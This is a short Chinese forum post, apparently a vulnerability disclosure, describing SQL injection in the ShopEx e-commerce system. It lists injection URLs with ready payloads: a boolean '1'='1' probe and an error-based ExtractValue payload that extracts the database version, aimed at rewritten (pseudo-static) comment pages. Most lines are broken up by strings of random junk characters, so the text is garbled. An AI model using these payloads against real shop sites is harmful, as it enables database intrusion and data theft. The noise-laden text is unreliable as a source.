注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… , D- l; ?! f' T7 }3 F/ @' f+ t: a
2 P' i; ^7 j3 u; N: K1 ?/ Z) c( V
好吧,我扯远了~~. H) R. K; Y2 c C0 d" W7 `
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~7 P: j; x$ G3 [% f! c6 z/ z& g
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: 1 A5 @) T8 j# z9 C, s
" T+ [4 p1 ]# Y0 L( n+ w+ E. |http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html * s1 K3 e! r7 |' G0 G
( {$ l' P* G* p; o5 q1 N
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
2 D& b4 ^7 v) |8 h$ ^* J* ^
% `4 {! d V+ U; z" Y' T) dhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
' e( ]$ x Z4 Y; N9 d, O/ X# k, U
4 Y# _4 | k6 @6 g% n! zhttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html 1 s0 O% w9 R6 X
, t! r$ O+ x8 r3 W! [+ l# P3 ^ 0 z9 r/ M/ l5 Y. F7 E2 S% t3 k
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
1 a- H( s6 U( ?' c如何注入就不多说了,10多年的东西了…不会也会了… 7 H3 Z9 U$ B) ]- B( Q
) P P5 v, r" e6 ~: j" q2 X
2 M3 R* k3 P0 C0 e' A3 q. b: J2 r, d# O3 ^+ Q) R
- K" ?1 k0 V$ l, A* a8 f5 Y |